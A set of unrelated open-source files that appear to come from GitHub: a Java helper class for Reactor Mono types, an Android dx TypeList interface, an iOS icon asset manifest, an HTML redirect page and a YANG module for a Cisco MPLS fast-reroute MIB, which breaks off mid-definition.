import java.util.function.BinaryOperator;
import java.util.function.Consumer;
import java.util.function.Function;
import java.util.function.Predicate;
import java.util.stream.Stream;
/**
* Companion class for working with Reactor Mono types
*
* @author johnmcclean
*
*/
@UtilityClass
public class Monos {
public static <T> Mono<Flux<T>> sequence(final Publisher<? extends Mono<T>> fts) {
Mono<Flux<T>> identity = Mono.just(Flux.empty());
BiFunction<Mono<Flux<T>>,Mono<T>,Mono<Flux<T>>> combineToStream = (acc,next) ->acc.zipWith(next,(a,b)->Flux.concat(a,Flux.just(b)));
return Flux.from(fts).reduce(identity, combineToStream).flatMap(i->i);
}
public static <T,R> Mono<Flux<R>> traverse(Function<? super T,? extends R> fn,Publisher<Mono<T>> stream) {
Flux<Mono<R>> s = Flux.from(stream).map(h -> h.map(fn));
return sequence(s);
}
public static <T, R> Mono< R> tailRec(T initial, Function<? super T, ? extends Mono<? extends Either<T, R>>> fn) {
Mono<? extends Either<T, R>> next[] = new Mono[1];
next[0] = Mono.just(Either.left(initial));
boolean cont = true;
do {
cont = next[0].map(p -> p.fold(s -> {
next[0] = fn.apply(s);
return true;
}, pr -> false)).block();
} while (cont);
return next[0].map(e->e.orElse(null));
}
public static <T> Future[] futures(Mono<T>... futures){
Future[] array = new Future[futures.length];
for(int i=0;i<array.length;i++){
array[i]=future(futures[i]);
}
return array;
}
public static <T> Future<T> future(Mono<T> future){
return Future.of(future.toFuture());
}
public static <R> Either<Throwable,R> either(Mono<R> either){
return Either.fromPublisher(either);
}
public static <T> Maybe<T> maybe(Mono<T> opt){
return Maybe.fromFuture(future(opt));
}
public static <T> Eval<T> eval(Mono<T> opt){
return Eval.fromFuture(future(opt));
}
/**
* Select the first Mono to complete
*
* @see CompletableFuture#anyOf(CompletableFuture...)
* @param fts Monos to race
* @return First Mono to complete
*/
public static <T> Mono<T> anyOf(Mono<T>... fts) {
return Mono.from(Future.anyOf(futures(fts)));
}
/**
* Wait until all the provided Future's to complete
*
* @see CompletableFuture#allOf(CompletableFuture...)
*
* @param fts Monos to wait on
* @return Mono that completes when all the provided Futures Complete. Empty Future result, or holds an Exception
* from a provided Future that failed.
*/
public static <T> Mono<T> allOf(Mono<T>... fts) {
return Mono.from(Future.allOf(futures(fts)));
}
/**
* Block until a Quorum of results have returned as determined by the provided Predicate
*
* <pre>
* {@code
*
* Mono<ListX<Integer>> strings = Monos.quorum(status -> status.getCompleted() >0, Mono.deferred(()->1),Mono.empty(),Mono.empty());
strings.get().size()
//1
*
* }
* </pre>
*
*
* @param breakout Predicate that determines whether the block should be
* continued or removed
* @param fts FutureWs to wait on results from
* @param errorHandler Consumer to handle any exceptions thrown
* @return Future which will be populated with a Quorum of results
*/
@SafeVarargs
public static <T> Mono<ListX<T>> quorum(Predicate<Status<T>> breakout, Consumer<Throwable> errorHandler, Mono<T>... fts) {
return Mono.from(Futures.quorum(breakout,errorHandler,futures(fts)));
}
/**
* Block until a Quorum of results have returned as determined by the provided Predicate
*
* <pre>
* {@code
*
* Mono<ListX<Integer>> strings = Monos.quorum(status -> status.getCompleted() >0, Mono.deferred(()->1),Mono.empty(),Mono.empty());
strings.get().size()
//1
*
* }
* </pre>
*
*
* @param breakout Predicate that determines whether the block should be
* continued or removed
* @param fts Monos to wait on results from
* @return Mono which will be populated with a Quorum of results
*/
@SafeVarargs
public static <T> Mono<ListX<T>> quorum(Predicate<Status<T>> breakout, Mono<T>... fts) {
return Mono.from(Futures.quorum(breakout,futures(fts)));
}
/**
* Select the first Future to return with a successful result
*
* <pre>
* {@code
* Mono<Integer> ft = Mono.empty();
Mono<Integer> result = Monos.firstSuccess(Mono.deferred(()->1),ft);
ft.complete(10);
result.get() //1
* }
* </pre>
*
* @param fts Monos to race
* @return First Mono to return with a result
*/
@SafeVarargs
public static <T> Mono<T> firstSuccess(Mono<T>... fts) {
return Mono.from(Future.firstSuccess(futures(fts)));
}
/**
* Perform a For Comprehension over a Mono, accepting 3 generating functions.
* This results in a four level nested internal iteration over the provided Monos.
*
* <pre>
* {@code
*
* import static cyclops.companion.reactor.Monos.forEach4;
*
forEach4(Mono.just(1),
a-> Mono.just(a+1),
(a,b) -> Mono.<Integer>just(a+b),
(a,b,c) -> Mono.<Integer>just(a+b+c),
Tuple::tuple)
*
* }
* </pre>
*
* @param value1 top level Mono
* @param value2 Nested Mono
* @param value3 Nested Mono
* @param value4 Nested Mono
* @param yieldingFunction Generates a result per combination
* @return Mono with a combined value generated by the yielding function
*/
public static <T1, T2, T3, R1, R2, R3, R> Mono<R> forEach4(Mono<? extends T1> value1,
Function<? super T1, ? extends Mono<R1>> value2,
BiFunction<? super T1, ? super R1, ? extends Mono<R2>> value3,
Function3<? super T1, ? super R1, ? super R2, ? extends Mono<R3>> value4,
Function4<? super T1, ? super R1, ? super R2, ? super R3, ? extends R> yieldingFunction) {
Future<? extends R> res = Future.fromPublisher(value1).flatMap(in -> {
Future<R1> a = Future.fromPublisher(value2.apply(in));
return a.flatMap(ina -> {
Future<R2> b = Future.fromPublisher(value3.apply(in, ina));
return b.flatMap(inb -> {
Future<R3> c = Future.fromPublisher(value4.apply(in, ina, inb));
return c.map(in2 -> yieldingFunction.apply(in, ina, inb, in2));
});
});
});
return Mono.from(res);
}
/**
* Perform a For Comprehension over a Mono, accepting 2 generating functions.
* This results in a three level nested internal iteration over the provided Monos.
*
* <pre>
* {@code
*
* import static cyclops.companion.reactor.Monos.forEach3;
*
forEach3(Mono.just(1),
a-> Mono.just(a+1),
(a,b) -> Mono.<Integer>just(a+b),
Tuple::tuple)
*
* }
* </pre>
*
* @param value1 top level Mono
* @param value2 Nested Mono
* @param value3 Nested Mono
* @param yieldingFunction Generates a result per combination
* @return Mono with a combined value generated by the yielding function
*/
public static <T1, T2, R1, R2, R> Mono<R> forEach3(Mono<? extends T1> value1,
Function<? super T1, ? extends Mono<R1>> value2,
BiFunction<? super T1, ? super R1, ? extends Mono<R2>> value3,
Function3<? super T1, ? super R1, ? super R2, ? extends R> yieldingFunction) {
Future<? extends R> res = Future.fromPublisher(value1).flatMap(in -> {
Future<R1> a = Future.fromPublisher(value2.apply(in));
return a.flatMap(ina -> {
Future<R2> b = Future.fromPublisher(value3.apply(in, ina));
return b.map(in2 -> yieldingFunction.apply(in, ina, in2));
});
});
return Mono.from(res);
}
/**
* Perform a For Comprehension over a Mono, accepting a generating function.
* This results in a two level nested internal iteration over the provided Monos.
*
* <pre>
* {@code
*
* import static cyclops.companion.reactor.Monos.forEach;
*
forEach(Mono.just(1),
a-> Mono.just(a+1),
Tuple::tuple)
*
* }
* </pre>
*
* @param value1 top level Mono
* @param value2 Nested Mono
* @param yieldingFunction Generates a result per combination
* @return Mono with a combined value generated by the yielding function
*/
public static <T, R1, R> Mono<R> forEach(Mono<? extends T> value1,
Function<? super T, Mono<R1>> value2,
BiFunction<? super T, ? super R1, ? extends R> yieldingFunction) {
Future<R> res = Future.fromPublisher(value1).flatMap(in -> {
Future<R1> a = Future.fromPublisher(value2.apply(in));
return a.map(ina -> yieldingFunction.apply(in, ina));
});
return Mono.from(res);
}
/**
* Lazily combine this Mono with the supplied value via the supplied BiFunction
*
* @param mono Mono to combine with another value
* @param app Value to combine with supplied mono
* @param fn Combiner function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> combine(Mono<? extends T1> mono, Value<? extends T2> app,
BiFunction<? super T1, ? super T2, ? extends R> fn) {
return Mono.from(Future.of(mono.toFuture())
.zip(app, fn));
}
/**
* Lazily combine this Mono with the supplied Mono via the supplied BiFunction
*
* @param mono Mono to combine with another value
* @param app Mono to combine with supplied mono
* @param fn Combiner function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> combine(Mono<? extends T1> mono, Mono<? extends T2> app,
BiFunction<? super T1, ? super T2, ? extends R> fn) {
return Mono.from(Future.of(mono.toFuture())
.zip(Future.of(app.toFuture()), fn));
}
/**
* Combine the provided Mono with the first element (if present) in the provided Iterable using the provided BiFunction
*
* @param mono Mono to combine with an Iterable
* @param app Iterable to combine with a Mono
* @param fn Combining function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> zip(Mono<? extends T1> mono, Iterable<? extends T2> app,
BiFunction<? super T1, ? super T2, ? extends R> fn) {
return Mono.from(Future.of(mono.toFuture())
.zip(app, fn));
}
/**
* Combine the provided Mono with the first element (if present) in the provided Publisher using the provided BiFunction
*
* @param mono Mono to combine with a Publisher
* @param fn Publisher to combine with a Mono
* @param app Combining function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> zip(Mono<? extends T1> mono, BiFunction<? super T1, ? super T2, ? extends R> fn,
Publisher<? extends T2> app) {
Mono<R> res = Mono.from(Future.of(mono.toFuture()).zip(fn,app));
return res;
}
/**
* Construct a Mono from Iterable by taking the first value from Iterable
*
* @param t Iterable to populate Mono from
* @return Mono containing first element from Iterable (or empty Mono)
*/
public static <T> Mono<T> fromIterable(Iterable<T> t) {
return Mono.from(Flux.fromIterable(t));
}
/**
* Get an Iterator for the value (if any) in the provided Mono
*
* @param pub Mono to get Iterator for
* @return Iterator over Mono value
*/
public static <T> Iterator<T> iterator(Mono<T> pub) {
return Future.fromPublisher(pub).iterator();
}
public static <R> Mono<R> narrow(Mono<? extends R> apply) {
return (Mono<R>)apply;
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.duy.dx .rop.type;
/**
* List of {@link Type} instances (or of things that contain types).
*/
public interface TypeList {
/**
* Returns whether this instance is mutable. Note that the
* {@code TypeList} interface itself doesn't provide any
* means of mutation, but that doesn't mean that there isn't an
* extra-interface way of mutating an instance.
*
* @return {@code true} if this instance is mutable or
* {@code false} if it is immutable
*/
public boolean isMutable();
/**
* Gets the size of this list.
*
* @return {@code >= 0;} the size
*/
public int size();
/**
* Gets the indicated element. It is an error to call this with the
* index for an element which was never set; if you do that, this
* will throw {@code NullPointerException}.
*
* @param n {@code >= 0, < size();} which element
* @return {@code non-null;} the indicated element
*/
public Type getType(int n);
/**
* Gets the number of 32-bit words required to hold instances of
* all the elements of this list. This is a sum of the widths (categories)
* of all the elements.
*
* @return {@code >= 0;} the required number of words
*/
public int getWordCount();
/**
* Returns a new instance which is identical to this one, except that
* the given item is appended to the end and it is guaranteed to be
* immutable.
*
* @param type {@code non-null;} item to append
* @return {@code non-null;} an appropriately-constructed instance
*/
public TypeList withAddedType(Type type);
}
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "20x20"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "20x20"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "29x29"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "29x29"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "40x40"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "40x40"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "60x60"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "60x60"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "20x20"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "20x20"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "29x29"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "29x29"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "40x40"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "40x40"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "76x76"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "76x76"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "83.5x83.5"
},
{
"idiom" : "ios-marketing",
"scale" : "1x",
"size" : "1024x1024"
}
],
"info" : {
"author" : "xcode",
"version" : 1
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="refresh" content="0;URL=../../libc/fn.execv.html">
</head>
<body>
<p>Redirecting to <a href="../../libc/fn.execv.html">../../libc/fn.execv.html</a>...</p>
<script>location.replace("../../libc/fn.execv.html" + location.search + location.hash);</script>
</body>
</html> | {
"pile_set_name": "Github"
} |
/*
* Generated by confdc --mib2yang-std
* Source: mgmt/dmi/model/mib/src/CISCO-IETF-FRR-MIB.mib
*/
/*
* This YANG module has been generated by smidump 0.5.0:
*
* smidump -f yang CISCO-IETF-FRR-MIB
*
* Do not edit. Edit the source file instead!
*/
module CISCO-IETF-FRR-MIB {
namespace "urn:ietf:params:xml:ns:yang:smiv2:CISCO-IETF-FRR-MIB";
prefix CISCO-IETF-FRR-MIB;
import IF-MIB {
prefix "if-mib";
}
import MPLS-TC-STD-MIB {
prefix "mpls-tc";
}
import SNMPv2-TC {
prefix "snmpv2-tc";
}
import ietf-yang-smiv2 {
prefix "smiv2";
}
import ietf-yang-types {
prefix "yang";
}
organization
"Cisco Systems, Inc.";
contact
"
Adrien Grise
Postal: 300 Apollo Drive
Cisco Systems, Inc.
Chelmsford, MA 01824
Tel: +1-978-497-3989
Email: [email protected]
Thomas D. Nadeau
Postal: Cisco Systems, Inc.
250 Apollo Drive
Chelmsford, MA 01924
Tel: +1-978-244-3051
Email: [email protected]
MPLS MIB Development Team
Postal: Cisco Systems, Inc.
250 Apollo Drive
Chelmsford, MA 01924
Tel: +1-978-497-3989
Email: [email protected]";
description
"This MIB module contains managed object definitions for MPLS
Fast Reroute (FRR) as defined in:Pan, P., Gan, D., Swallow, G.,
Vasseur, J.Ph., Cooper, D., Atlas, A., Jork, M., Fast Reroute
Techniques in RSVP-TE, draft-ietf-mpls-rsvp-lsp-fastreroute-
00.txt, January 2002.";
revision 2008-04-29 {
description
"Added support for cmplsFrrUnProtected notification. It is
defined in version 2 of the ietf draft. The notification's
variable bindings have been modified from the draft form to
match the previous approved Cisco-ized draft form as defined
for the cmplsFrrProtected notification.";
}
revision 2002-11-05 {
description
"Cisco'ized the MPLS-FRR-MIB.my file";
}
revision 2002-11-01 {
description
"Added support for Facility-based FRR.
Removed tables that were redundant with
other MPLS MIBs.
Assigned experimental.120.";
}
revision 2002-03-22 {
description
"Initial draft version.";
}
typedef MplsFrrDetourIndex {
type int32 {
range "1..65535";
}
description
"Index into mplsFrrDetourTable.";
}
container CISCO-IETF-FRR-MIB {
config false;
container cmplsFrrScalars {
smiv2:oid "1.3.6.1.4.1.9.10.98.1";
leaf cmplsFrrDetourIncoming {
type uint32;
description
"The number of detour LSPs entering the device if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0), or
or 0 if mplsFrrConstProtectionMethod is set to
facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.1";
}
leaf cmplsFrrDetourOutgoing {
type uint32;
description
"The number of detour LSPs leaving the device if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0),
or 0 if mplsFrrConstProtectionMethod is set to
to facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.2";
}
leaf cmplsFrrDetourOriginating {
type uint32;
description
"The number of detour LSPs originating at this PLR if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0).
This object MUST return 0 if the mplsFrrConstProtectionMethod
is set to facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.3";
}
leaf cmplsFrrSwitchover {
type uint32;
description
"The number of tunnel instances that are switched over to their
corresponding detour LSP if mplsFrrConstProtectionMethod is set
to oneToOneBackup(0), or tunnels being switched over if
mplsFrrConstProtectionMethod is set to facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.4";
}
leaf cmplsFrrNumOfConfIfs {
type uint32;
description
"Indicates the number of MPLS interfaces configured for
protection by the FRR feature, otherwise this value
MUST return 0 to indicate that LSPs traversing any
interface may be protected.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.5";
}
leaf cmplsFrrActProtectedIfs {
type uint32;
description
"Indicates the number of interfaces currently being protected
by the FRR feature if mplsFrrConstProtectionMethod is set to
facilityBackup(1), otherwise this value should return 0 to
indicate that LSPs traversing any interface may be protected.
This value MUST be less than or equal to mplsFrrConfIfs.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.6";
}
leaf cmplsFrrConfProtectingTuns {
type uint32;
description
"Indicates the number of bypass tunnels configured to
protect facilities on this LSR using the FRR feature
if mplsFrrConstProtectionMethod is set to
facilityBackup(1), otherwise this value MUST return
0.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.7";
}
leaf cmplsFrrActProtectedTuns {
type uint32;
description
"Indicates the number of bypass tunnels indicated in
mplsFrrConfProtectingTuns whose operStatus
is up(1) indicating that they are currently protecting
facilities on this LSR using the FRR feature. This
object MUST return 0 if mplsFrrConstProtectionMethod
is set to facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.8";
}
leaf cmplsFrrActProtectedLSPs {
type uint32;
description
"Indicates the number of LSPs currently protected by
the FRR feature. If mplsFrrConstProtectionMethod is set
to facilityBackup(1)this object MUST return 0.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.9";
}
leaf cmplsFrrConstProtectionMethod {
type enumeration {
enum "oneToOneBackup" {
value "0";
}
enum "facilityBackup" {
value "1";
}
}
description
"Indicates which protection method is to be used for fast
reroute. Some devices may require a reboot of their routing
processors if this variable is changed. An agent which
does not wish to reboot or modify its FRR mode
MUST return an inconsistentValue error. Please
consult the device's agent capability statement
for more details.";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.10";
}
leaf cmplsFrrNotifsEnabled {
type boolean;
description
"Enables or disables FRR notifications defined in this MIB
module. Notifications are disabled by default.";
smiv2:defval "false";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.11";
}
leaf cmplsFrrLogTableMaxEntries {
type uint32;
description
"Indicates the maximum number of entries allowed in the FRR
Log table. Agents receiving SETs for values that cannot be
used must return an inconsistent value error. If a manager
sets this value to 0, this indicates that no logging should
take place by the agent.
If this value is returned as 0, this indicates
that no additional log entries will be added to the current
table either because the table has been completely
filled or logging has been disabled. However, agents
may wish to not delete existing entries in the log table
so that managers may review them in the future.
It is implied that when mplsFrrLogTableCurrEntries
has reached the value of this variable, that logging
entries may not continue to be added to the table,
although existing ones may remain. Furthermore, an
agent may begin to delete existing (perhaps the
oldest entries) entries to make room for new ones.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.12";
}
leaf cmplsFrrLogTableCurrEntries {
type yang:counter32;
description
"Indicates the current number of entries in the FRR log
table.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.13";
}
leaf cmplsFrrNotifMaxRate {
type uint32;
description
"This variable indicates the number of milliseconds
that must elapse between notification emissions. If
events occur more rapidly, the implementation may
simply fail to emit these notifications during that
period, or may queue them until an appropriate
time in the future. A value of 0 means no minimum
elapsed period is specified.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.14";
}
}
container cmplsFrrConstTable {
description
"This table shows detour setup constraints.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1";
list cmplsFrrConstEntry {
key "cmplsFrrConstIfIndex cmplsFrrConstTunnelIndex cmplsFrrConstTunnelInstance";
description
"An entry in this table represents detour LSP or bypass tunnel
setup constraints for a tunnel instance to be protected by
detour LSPs or a tunnel. Agents must allow entries in this table
to be created only for tunnel instances that require fast-reroute.
Entries indexed with mplsFrrConstIfIndex set to 0 apply to all
interfaces on this device for which the FRR feature can operate
on.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1";
leaf cmplsFrrConstIfIndex {
type if-mib:InterfaceIndexOrZero;
description
"Uniquely identifies an interface for which fast reroute is
configured. Tabular entries indexed with a 0 value apply to all
interfaces on this device for which the FRR feature can operate
on.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.1";
}
leaf cmplsFrrConstTunnelIndex {
type mpls-tc:MplsTunnelIndex;
description
"Uniquely identifies a tunnel for which fast reroute is
requested.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.2";
}
leaf cmplsFrrConstTunnelInstance {
type mpls-tc:MplsTunnelInstanceIndex;
description
"Uniquely identifies an instance of this tunnel for which fast
reroute is requested.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.3";
}
leaf cmplsFrrConstSetupPrio {
type uint32 {
range "0..7";
}
description
"Indicates the setup priority of detour LSP.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001";
smiv2:defval "7";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.4";
}
leaf cmplsFrrConstHoldingPrio {
type uint32 {
range "0..7";
}
description
"Indicates the holding priority for detour LSP.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.5";
}
leaf cmplsFrrConstInclAnyAffinity {
type mpls-tc:MplsTunnelAffinity;
description
"A link satisfies the include-any constraint if and only if the
constraint is zero, or the link and the constraint have a
resource class in common.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.6";
}
leaf cmplsFrrConstInclAllAffinity {
type mpls-tc:MplsTunnelAffinity;
description
"A link satisfies the include-all constraint if and only if the
link contains all of the administrative groups specified in the
constraint.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.7";
}
leaf cmplsFrrConstExclAllAffinity {
type mpls-tc:MplsTunnelAffinity;
description
"A link satisfies the exclude-all constraint if and only if the
link contains none of the administrative groups specified in the
constraint.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.8";
}
leaf cmplsFrrConstHopLimit {
type uint32 {
range "1..65535";
}
description
"The maximum number of hops that the detour LSP may traverse.";
reference
"Pan, P., Gan, D., Swallow, G., Vasseur, J.Ph., Cooper, D.,
Atlas, A., Jork, M., Fast Reroute Techniques in RSVP-TE, draft-
ietf-mpls-rsvp-lsp-fastreroute-00.txt, January 2002. Work in
progress.";
smiv2:defval "32";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.9";
}
leaf cmplsFrrConstBandwidth {
type mpls-tc:MplsBitRate;
description
"This variable represents the bandwidth for detour LSPs of this
tunnel, in units of thousands of bits per second (Kbps).";
smiv2:defval "1";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.10";
}
leaf cmplsFrrConstRowStatus {
type snmpv2-tc:RowStatus;
description
"This object is used to create, modify, and/or delete a row in
this table.";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.11";
}
leaf cmplsFrrConstNumProtectingTunOnIf {
type yang:gauge32;
description
"The number of backup tunnels protecting the specified
interface.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.12";
}
leaf cmplsFrrConstNumProtectedTunOnIf {
type yang:gauge32;
description
"The number of tunnels protected on this interface.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.13";
}
}
}
container cmplsFrrLogTable {
description
"The fast reroute log table records fast reroute events such
as protected links going up or down or the FRR feature
kicking in.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2";
list cmplsFrrLogEntry {
key "cmplsFrrLogIndex";
description
"An entry in this table is created to describe one fast
reroute event. Entries in this table are only created and
destroyed by the agent implementation. The maximum number
of entries in this log is governed by the scalar.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1";
leaf cmplsFrrLogIndex {
type uint32;
description
"Uniquely identifies a fast reroute event entry.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.1";
}
leaf cmplsFrrLogEventTime {
type yang:timestamp;
description
"This object provides the amount of time ticks since this
event occured.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.2";
}
leaf cmplsFrrLogInterface {
type if-mib:InterfaceIndexOrZero;
description
"This object indicates which interface was affected by this
FRR event. This value may be set to 0 if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0).";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.3";
}
leaf cmplsFrrLogEventType {
type enumeration {
enum "other" {
value "1";
}
enum "protected" {
value "2";
}
}
description
"This object describes what type of fast reroute event
occured.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.4";
}
leaf cmplsFrrLogEventDuration {
type yang:timeticks;
description
"This object describes the duration of this event.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.5";
}
leaf cmplsFrrLogEventReasonString {
type binary {
length "128";
}
description
"This object contains an implementation-specific explanation
of the event.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.6";
}
}
}
container cmplsFrrFacRouteDBTable {
description
"The mplsFrrFacRouteDBTable provides information about the
fast reroute database. Each entry belongs to an interface,
protecting backup tunnel and protected tunnel. MPLS
interfaces defined on this node are protected by backup
tunnels and are indexed by mplsFrrFacRouteProtectedIndex.
Backup tunnels defined to protect the tunnels traversing an
interface, and are indexed by
mplsFrrFacRouteProtectingTunIndex. Note that the tunnel
instance index is not required, since it is implied to be 0,
which indicates the tunnel head interface for the protecting
tunnel. The protecting tunnel is defined to exist on the PLR
in the FRR specification. Protected tunnels are the LSPs that
traverse the protected link. These LSPs are uniquely
identified by mplsFrrFacRouteProtectedTunIndex,
mplsFrrFacRouteProtectedTunInstance,
mplsFrrFacRouteProtectedTunIngressLSRId, and
mplsFrrFacRouteProtectedTunEgressLSRId.";
reference
"Srinivansan, C., and A. Viswanathan, T. Nadeau, MPLS Traffic
Engineering Management Information Base Using SMIv2,
draft-ietf-mpls-te-mib-06.txt ";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1";
list cmplsFrrFacRouteDBEntry {
key "cmplsFrrFacRouteProtectedIfIndex cmplsFrrFacRouteProtectingTunIndex cmplsFrrFacRouteProtectedTunIndex cmplsFrrFacRouteProtectedTunInstance cmplsFrrFacRouteProtectedTunIngressLSRId cmplsFrrFacRouteProtectedTunEgressLSRId";
description
"An entry in the mplsFrrDBTable represents a single protected
LSP, protected by a backup tunnel and defined for a specific
protected interface. Note that for brevity, managers should
consult the mplsTunnelTable present in the MPLS-TE MIB for
additional information about the protecting and protected
tunnels, and the ifEntry in the IF-MIB for the protected
interface.";
reference
"Srinivansan, C., and A. Viswanathan, T. Nadeau, MPLS Label
Switch Router Management Information Base Using SMIv2,
draft-ietf-mpls-lsr-mib-07.txt Srinivansan, C., and A.
Viswanathan, T. Nadeau, MPLS Traffic Engineering Management
Information Base Using SMIv2, draft-ietf-mpls-te-mib-
06.txt.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1";
leaf cmplsFrrFacRouteProtectedIfIndex {
type if-mib:InterfaceIndex;
description
"Uniquely identifies the interface configured for FRR protection.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.1";
}
leaf cmplsFrrFacRouteProtectingTunIndex {
type mpls-tc:MplsTunnelIndex;
description
"Uniquely identifies the mplsTunnelEntry primary index for
the tunnel head interface designated to protect the
interface as specified in the mplsFrrFacRouteIfProtectedIndex
(and all of the tunnels using this interface).";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.2";
}
leaf cmplsFrrFacRouteProtectedTunIndex {
type mpls-tc:MplsTunnelIndex;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.3";
}
leaf cmplsFrrFacRouteProtectedTunInstance {
type mpls-tc:MplsTunnelInstanceIndex;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.4";
}
leaf cmplsFrrFacRouteProtectedTunIngressLSRId {
